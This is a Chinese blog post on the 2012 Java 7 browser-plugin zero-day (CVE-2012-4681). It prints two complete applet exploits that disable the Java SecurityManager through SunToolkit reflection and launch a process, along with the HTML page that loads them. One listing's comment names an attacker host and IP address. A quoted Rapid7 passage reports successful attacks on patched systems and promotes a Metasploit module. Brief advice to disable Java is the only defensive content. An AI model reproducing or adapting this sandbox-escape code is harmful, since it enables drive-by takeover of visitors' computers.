java新0day

最新推荐文章于 2023-07-05 11:44:26 发布
最新推荐文章于 2023-07-05 11:44:26 发布
阅读量926 收藏
点赞数
分类专栏: 信息安全 文章标签: Java

jre 远程代码执行

产生:

FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击,进而控制网民用户的计算机。在捕获的样本中发现使用了Dadong’s JSXX 0.44 VIP加密方式。目前,该漏洞的利用代码已被公开,而官方尚未发布任何补丁;在补丁发布之前,建议用户卸载或禁用JRE(如果安装了JRE)。

报告地址:http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html

影响:

此漏洞影响JRE[1.7.x]插件,不影响java 6及以下

受影响浏览器:

包括IE、Firefox、opera、chrome

补丁状态:

目前尚未补丁!

相关代码:

我测试的Java源码

[java] view plain copy
  1. package test0day;  
  2.   
  3. import java.applet.Applet;  
  4. import java.awt.Graphics;  
  5. import java.beans.Expression;  
  6. import java.beans.Statement;  
  7. import java.lang.reflect.Field;  
  8. import java.net.URL;  
  9. import java.security.AccessControlContext;  
  10. import java.security.AllPermission;  
  11. import java.security.CodeSource;  
  12. import java.security.Permissions;  
  13. import java.security.ProtectionDomain;  
  14. import java.security.cert.Certificate;  
  15.   
  16. public class Gondvv20120828_1 extends Applet {  
  17.   
  18.     public Gondvv20120828_1() {  
  19.   
  20.     }  
  21.     public void disableSecurity() throws Throwable {  
  22.         Statement localStatement = new Statement(System.class,  
  23.                 "setSecurityManager"new Object[1]);  
  24.         Permissions localPermissions = new Permissions();  
  25.         localPermissions.add(new AllPermission());  
  26.         ProtectionDomain localProtectionDomain = new ProtectionDomain(  
  27.                 new CodeSource(new URL("file:///"), new Certificate[0]),  
  28.                 localPermissions);  
  29.         AccessControlContext localAccessControlContext = new AccessControlContext(  
  30.                 new ProtectionDomain[] { localProtectionDomain });  
  31.         SetField(Statement.class"acc", localStatement,  
  32.                 localAccessControlContext);  
  33.         localStatement.execute();  
  34.     }  
  35.   
  36.     private Class GetClass(String paramString) throws Throwable {  
  37.         Object arrayOfObject[] = new Object[1];  
  38.         arrayOfObject[0] = paramString;  
  39.         Expression localExpression = new Expression(Class.class"forName",  
  40.                 arrayOfObject);  
  41.         localExpression.execute();  
  42.         return (Class) localExpression.getValue();  
  43.     }  
  44.   
  45.     private void SetField(Class paramClass, String paramString,  
  46.             Object paramObject1, Object paramObject2) throws Throwable {  
  47.         Object arrayOfObject[] = new Object[2];  
  48.         arrayOfObject[0] = paramClass;  
  49.         arrayOfObject[1] = paramString;  
  50.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);  
  51.         localExpression.execute();  
  52.         ((Field) localExpression.getValue()).set(paramObject1, paramObject2);  
  53.     }  
  54.   
  55.     public void init() {  
  56.         try {  
  57.             disableSecurity();  
  58.             Process localProcess = null;  
  59.             localProcess = Runtime.getRuntime().exec("calc.exe");  
  60.             if (localProcess != null)  
  61.                 ;  
  62.             localProcess.waitFor();  
  63.         } catch (Throwable localThrowable) {  
  64.             localThrowable.printStackTrace();  
  65.         }  
  66.     }  
  67.   
  68.     public void paint(Graphics paramGraphics) {  
  69.         paramGraphics.drawString("Loading"5025);  
  70.     }  
  71. }  

网页源码:

[html] view plain copy
  1. <html>  
  2.  <body bgcolor="#0F0F0F">  
  3.   <applet code="./test0day/Gondvv20120828_1.class" width="300" height="200" alt="抱歉,您的浏览器不支持Java applet" align="center" vspace="20"></applet>  
  4.  </body>  
  5. </html>  

网络中java源码:

[java] view plain copy
  1. //  
  2. // CVE-2012-XXXX Java 0day  
  3. //  
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html  
  5. //   
  6. // secret host / ip : ok.aa24.net / 59.120.154.62  
  7. //  
  8. // regurgitated by jduck  
  9. //  
  10. // probably a metasploit module soon...  
  11. //  
  12. package cve2012xxxx;  
  13.   
  14. import java.applet.Applet;  
  15. import java.awt.Graphics;  
  16. import java.beans.Expression;  
  17. import java.beans.Statement;  
  18. import java.lang.reflect.Field;  
  19. import java.net.URL;  
  20. import java.security.*;  
  21. import java.security.cert.Certificate;  
  22.   
  23. public class Gondvv extends Applet  
  24. {  
  25.   
  26.     public Gondvv()  
  27.     {  
  28.     }  
  29.   
  30.     public void disableSecurity()  
  31.         throws Throwable  
  32.     {  
  33.         Statement localStatement = new Statement(System.class"setSecurityManager"new Object[1]);  
  34.         Permissions localPermissions = new Permissions();  
  35.         localPermissions.add(new AllPermission());  
  36.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);  
  37.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {  
  38.             localProtectionDomain  
  39.         });  
  40.         SetField(Statement.class"acc", localStatement, localAccessControlContext);  
  41.         localStatement.execute();  
  42.     }  
  43.   
  44.     private Class GetClass(String paramString)  
  45.         throws Throwable  
  46.     {  
  47.         Object arrayOfObject[] = new Object[1];  
  48.         arrayOfObject[0] = paramString;  
  49.         Expression localExpression = new Expression(Class.class"forName", arrayOfObject);  
  50.         localExpression.execute();  
  51.         return (Class)localExpression.getValue();  
  52.     }  
  53.   
  54.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)  
  55.         throws Throwable  
  56.     {  
  57.         Object arrayOfObject[] = new Object[2];  
  58.         arrayOfObject[0] = paramClass;  
  59.         arrayOfObject[1] = paramString;  
  60.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);  
  61.         localExpression.execute();  
  62.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);  
  63.     }  
  64.   
  65.     public void init()  
  66.     {  
  67.         try  
  68.         {  
  69.             disableSecurity();  
  70.             Process localProcess = null;  
  71.             localProcess = Runtime.getRuntime().exec("calc.exe");  
  72.             if(localProcess != null);  
  73.                localProcess.waitFor();  
  74.         }  
  75.         catch(Throwable localThrowable)  
  76.         {  
  77.             localThrowable.printStackTrace();  
  78.         }  
  79.     }  
  80.   
  81.     public void paint(Graphics paramGraphics)  
  82.     {  
  83.         paramGraphics.drawString("Loading"5025);  
  84.     }  
  85. }  


测试结果:


解决方案:

见链接:http://www.java.com/zh_CN/download/help/enable_browser.xml

以下来源:https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day

The above example is a successful attack against a fully patched Windows 7 SP1 with Java 7 Update 6.  We have also tested the module against the following environments:

  • Mozilla Firefox on Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome on Windows XP
  • Internet Explorer / Mozilla Firefox on Windows Vista
  • Internet Explorer / Mozilla Firefox on Windows 7
  • Safari on OS X 10.7.4

 

As a user, you should take this problem seriously, because there is currently no patch from Oracle.  For now, our recommendation is to completely disable Java until a fix is available.

 

To try out this exploit: Get your free Metasploit download now, or update your existing installation.  Meanwhile, we will keep this blog updated when more progress has been made.

 

Aug 28 2012: This vulnerability has been assigned as CVE-2012-4681.

bobli
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 0day_Java 0day简略分析
weixin_39628343的博客
02-13 142
准备编译Gondvv.java,生成在Gondvv.class,在同目录下建test.htm,内容如下粗略观察一下java代码,应该是绕过了Java Sandbox,而并非是JVM中溢出等漏洞,所以可以直接调试java代码。setSecurityManager首先需要简单了解setSecurityManager()函数。setSecurityManager()用于设置一个SystemSecuri...
java-day10
bbbxxx111的博客
03-27 210
1.javaBean的概念? 一个可以重复使用的java类就叫一个javaBean组件. 一个javaBean应该具备以下特点: 1>必须是public修饰的类 2>一定要至少要有一个无参的构造方法 3> 属性一定要private修饰,get方法和set方法 使用javaBean组件创建一个对象就叫一个Bean对象 2.package关键字和import关键字 pac...
如何轻松应对广泛存在开源“0Day”
weixin_55163056的博客
07-05 232
如何快速实现0Day漏洞的影响溯源
CVE-2012-XXXX Java 0day
收集盒 Book box
09-03 659
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70
MSF实战-利用0day双杀java环境-宏感染-安卓客户端进行渗透
L120305q的博客
03-31 695
MSF实战笔记
利用0day-java环境-宏感染-安卓客户端进行渗透
m0_47510703的博客
01-30 6001
一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell 0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。 CVE-2018-8174 漏洞影响最版本的 IE 浏览器及使
javaday20
m0_55689307的博客
05-25 39
File类 package demo01; public class Demo01File { public static void main(String[] args) throws IOException { //路径分割符 String pathSeparator = File.pathSeparator; System.out.println(pathSeparator); //win 是分号 ; linux :冒号 //文件分割符 String separator=File.sepa
Javaday02训练
02-08
Java Day02训练是针对Java初学者或有一定基础的学习者设计的一次深入学习活动,旨在强化和巩固Java编程的基础知识。在这个训练中,你将接触到一系列关键的Java编程概念和技术,包括但不限于变量、数据类型、控制流程...
Java 0day Analysis
06-05
Java MBeanInstantiator.findClass 0day Analysis
java practice day by day
11-14
在十进制中,48-57代表0-9,65-90代表大写字母A-Z,97-122代表小写字母a-z。 4. **StringBuffer**:StringBuffer是String的扩展,用于处理大量字符串拼接的情况。相比String,它提供了线程安全的append方法,更适合...
java自学笔记day2
02-12
Java自学笔记Day2主要涉及了两个核心主题:二进制的使用和运算符,特别是算术运算符。在深入理解这些概念之前,首先要明白Java是一种广泛使用的后端开发语言,它构建于Apache等开源基础设施之上,因此掌握这些基础...
java day002.md
04-15
初学Java运算符,包扩算术运算符,关系运算符,逻辑运算符,自增自减运算符。其中有对自增自减运算符和逻辑运算符的一些心得体会与错误预防。
两年来首次发现Java 0day漏洞
cpongo5
08-15 240
最近Oracle公司宣布了一个近两年以来首个Java 0day漏洞,它影响着Java Web Start的应用程序沙箱和Java applets的沙箱。考虑到此漏洞正在被利用,加上它便于开发,根据CVSS(通用漏洞评分系统)给此漏洞以最高风险级别的评分。Oracle公司已经发布了一个补丁,并敦促客户尽快升级。\\该漏洞被确认为CVE-2015-2590,它是趋势科技的智能防护网络在分析一些针对北约...
Fastjson存在0day漏洞
lyl_goahead的博客
03-28 1037
Fastjson的0day漏洞处理方法
0day漏洞java_fastjson反序列化0day漏洞分析
weixin_36396810的博客
03-02 340
背景fastjson号称要做最好的json解析库,但是上半年连续搜收到两份安全部的漏洞警告,很尴尬,因此对fastjson漏洞做了一个简单的研究。本文会分析2017年的远程执行漏洞和2019年上半爆出的0day漏洞。名词解释:0day:信息安全意义上的0Day是指在系统商在知晓并发布相关补丁前就被掌握或者公开的漏洞信息。poc:Proof ofConcept,中文意思是“观点证明”。这个短语会在漏...
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透
weixin_46035615的博客
04-26 3418
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透 1 实战-利用 0DAY 漏洞获取 shell 2 实战-基于 java 环境的漏洞利用获取 shell 3 实战-利用宏感染 word 文档获取 shell 4 安卓客户端渗透
致远OA-A8系统的0day远程命令执行的实战
god_Zeo的安全博客
07-03 9048
致远OA-A8系统的0day远程命令执行的实战1.环境是实战,漏洞已经提交,打码子处理2.详细漏洞信息和修补参考CNVD官网查看https://www.cnvd.org.cn/webinfo/show/50953漏洞影响范围4漏洞的复现第一步第二步第三步附上POC 请勿用非法用途,只供研究和学习 1.环境是实战,漏洞已经提交,打码子处理 2.详细漏洞信息和修补参考CNVD官网查看https://w...
html css js网页设计
最新发布
07-12
HTML、CSS和JavaScript是构建网页和网站的基本技术,它们共同工作来创建和设计用户界面。下面是关于这三种技术的详细介绍: ### HTML (HyperText Markup Language) - **定义**:HTML是构建网页内容的标准标记语言。 - **作用**:用于创建网页的结构和内容,如段落、链接、图片、表格等。 - **语法**:使用标签(如 `<p>`, `<div>`, `<a>`, `<img>` 等)来定义网页元素。 ### CSS (Cascading Style Sheets) - **定义**:CSS是一种样式表语言,用于描述HTML文档的呈现方式。 - **作用**:用于设置网页的布局、颜色、字体和其他视觉元素。 - **语法**:通过选择器(如 `p`, `.myclass`, `#myid` 等)应用样式规则。 ### JavaScript - **定义**:JavaScript是一种脚本语言,通常用于网页上实现交互功能。 - **作用**:允许网页与用户进行交互,如响应用户操作、动态更内容、动画效果等。 - **语法**:Java
java 读取.day文件
06-08
3. 如果您希望使用Java读取.day文件,可以尝试使用Java的IO类和字节流来读取二进制数据,并根据.day文件的格式和结构解析其中的内容。这需要您对.day文件的格式和结构有一定的了解和理解。 综上所述,读取.day文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值